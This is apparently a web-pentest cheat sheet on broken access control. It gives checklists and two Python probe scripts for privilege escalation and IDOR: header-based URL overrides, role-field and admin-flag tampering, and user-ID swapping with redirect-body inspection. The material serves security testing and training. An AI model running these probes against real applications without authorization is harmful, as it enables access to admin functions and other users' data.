Broken Access Control

PRACTICE ! PRACTICE ! PRACTICE !

Vertical Privilege Escalation

  • Check for /admin, and read /robots.txt for any Disallow entries that point at hidden paths.

  • Check the page source and the JS files for hidden endpoints.

  • Log in as a normal user with response interception enabled and look for a role flag such as admin=true (or admin=false) in the responses; flip it to see whether the client trusts it.

  • Check any change/update request [POST] and tamper any roleid fields in the JSON body.

  • Check for URL-based access control: request an allowed path and add [X-Original-URL: /admin] | [X-Rewrite-URL: /admin].

  • If anything redirects (for example after login) to a URL that carries a user name, tamper it ["/username?id=akash" to "id=administrator" or "/username?id=carlos"].
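The three vertical checks above (header-based URL override, role fields in a JSON update, and an admin flag in an intercepted response) as one added example. This is not code from the page; it uses only the Python standard library, and ADMIN_PATH, the two header names, the role key names and the sample JSON body are assumptions to be adapted to the target. It builds the requests and tamper variants; send them with whatever proxy or client you are using.

```python
"""Vertical privilege escalation probes (added example, stdlib only).

Not the page's own code. ADMIN_PATH, the header names to try and the sample
JSON body are assumptions; adapt them to the target.
"""
import copy
import json
import re

ADMIN_PATH = "/admin"                                   # assumed protected path
OVERRIDE_HEADERS = ("X-Original-URL", "X-Rewrite-URL")  # honoured by some front ends


def url_override_requests(path=ADMIN_PATH, decoy="/"):
    """Requests for the URL-based access control check, as (method, path, headers).

    The first is the plain request (expected to be blocked). The rest request a
    harmless decoy path that the front-end control allows, while the header asks
    the back end to route to the protected path instead.
    """
    reqs = [("GET", path, {})]
    for name in OVERRIDE_HEADERS:
        reqs.append(("GET", decoy, {name: path}))
    return reqs


ROLE_KEYS = {"roleid", "role_id", "role", "isadmin", "is_admin", "admin"}
ESCALATED = (True, 1, 2, "admin", "administrator")  # values worth trying per field


def _set_path(node, path, value):
    for key in path[:-1]:
        node = node[key]
    node[path[-1]] = value


def role_tamper_variants(body):
    """For a captured JSON body (dict), return [(field_path, value, tampered_json)]
    with one copy per role-looking field and candidate value, nested keys included."""
    hits = []

    def walk(node, path):
        if isinstance(node, dict):
            for key, val in node.items():
                if key.lower() in ROLE_KEYS:
                    hits.append(path + [key])
                walk(val, path + [key])
        elif isinstance(node, list):
            for i, val in enumerate(node):
                walk(val, path + [i])

    walk(body, [])
    variants = []
    for path in hits:
        for cand in ESCALATED:
            tampered = copy.deepcopy(body)
            _set_path(tampered, path, cand)
            variants.append(("/".join(map(str, path)), cand, json.dumps(tampered)))
    return variants


# Matches admin=true, "isAdmin":false, is_admin: 1 ... in an intercepted response.
ADMIN_FLAG = re.compile(r'\b((?:is_?)?admin\W{0,3})(true|false|1|0)\b', re.I)


def find_admin_flags(text):
    """List every admin flag found in a response body (for the interception check)."""
    return [m.group(0) for m in ADMIN_FLAG.finditer(text)]


def flip_admin_flag(text):
    """Rewrite false->true / 0->1 on each admin flag; a client that then renders
    the admin UI is enforcing the role client-side only."""

    def repl(m):
        return m.group(1) + {"false": "true", "0": "1"}.get(m.group(2).lower(), m.group(2))

    return ADMIN_FLAG.sub(repl, text)


if __name__ == "__main__":
    for method, path, headers in url_override_requests():
        print(method, path, headers)
    captured = {"username": "wiener", "email": "wiener@example", "roleid": 1}  # constructed sample body
    for field, value, payload in role_tamper_variants(captured):
        print(f"set {field}={value!r}: {payload}")
    print(flip_admin_flag('{"username":"wiener","isAdmin":false}'))
```

A flipped flag that unlocks the admin UI only proves the client trusts the field; the finding is confirmed when an admin action sent with that session is accepted server-side.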

Horizontal Privilege Escalation

  • If another username is known, tamper the URL with that name.

  • If the application uses unpredictable user IDs, crawl the application and its source code for other users' IDs, then tamper the id parameter { ?id= }.

  • When tampering the user in the URL redirects to the login page or anywhere else, always check the response body of that redirect: the protected content may still be returned with the 3xx.

IDOR

  • Log in as a normal user and explore the tabs. If something can be downloaded, note the GET request and tamper its parameters, looking for files that contain passwords.

  • Have admin access? Try tampering the cookies.

  • Can you download or read messages in a sequential order? Try accessing the first number of that order.
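The Horizontal Privilege Escalation and IDOR checks above as one added example (not the page's own code): it replays a request with other users' IDs, refuses to follow redirects so the 3xx body can be inspected, and lists the first numbers of a sequential series to try. Standard library only; the target URL, the parameter name and the candidate usernames are assumptions, and the `fetch` function is injectable so the verdict logic can be exercised against canned responses.

```python
"""Horizontal privilege escalation / IDOR probe (added example, stdlib only).

Not the page's own code. The URL, parameter name and candidate values below
are assumptions; point them at the endpoint you are testing.
"""
import urllib.error
import urllib.request
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Refuse to follow 3xx so the redirect's own body is returned to us."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


_OPENER = urllib.request.build_opener(_NoRedirect)


def fetch(url, headers=None):
    """GET url without following redirects -> (status, headers, body_text)."""
    req = urllib.request.Request(url, headers=headers or {})
    try:
        with _OPENER.open(req, timeout=10) as resp:
            return resp.status, dict(resp.headers), resp.read().decode(errors="replace")
    except urllib.error.HTTPError as err:  # unfollowed 3xx and 4xx/5xx land here
        return err.code, dict(err.headers), err.read().decode(errors="replace")


def swap_param(url, name, value):
    """Return url with query parameter `name` set to `value` (added if absent)."""
    parts = urlsplit(url)
    query = dict(parse_qsl(parts.query, keep_blank_values=True))
    query[name] = value
    return urlunsplit(parts._replace(query=urlencode(query)))


def judge(status, body, own_body):
    """Classify one tampered response against our own (legitimate) one."""
    if 300 <= status < 400:
        # A redirect to /login is not a pass: the body may still carry the page.
        return "redirect-with-body" if body.strip() else "redirect"
    if status == 200:
        return "same-as-self" if body == own_body else "different-content"
    return "blocked"


def probe_ids(url, param, candidates, fetch=fetch):
    """Replay the request with each candidate id; return [(value, status, verdict)]."""
    _, _, own_body = fetch(url)  # baseline: the page as ourselves
    findings = []
    for value in candidates:
        status, _, body = fetch(swap_param(url, param, value))
        findings.append((value, status, judge(status, body, own_body)))
    return findings


def enumeration_candidates(observed_ids, first=3):
    """For a numeric series we were shown (message or export numbers), return the
    ids to request first: the start of the series and the neighbours of our range."""
    lo, hi = min(observed_ids), max(observed_ids)
    cands = list(range(1, first + 1)) + [lo - 1, hi + 1]
    return [c for c in dict.fromkeys(cands) if c > 0 and c not in observed_ids]


if __name__ == "__main__":
    target = "https://target.example/my-account?id=wiener"  # assumed endpoint
    for value, status, verdict in probe_ids(target, "id", ["carlos", "administrator"]):
        print(f"id={value}: HTTP {status} -> {verdict}")
    print("message ids to try:", enumeration_candidates({1017, 1018, 1019}))
```

"different-content" is a candidate finding, not proof: compare the body with what the other user should see before reporting it, and treat "redirect-with-body" as a finding whenever the 3xx body contains the other user's data.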

Last updated 2 years ago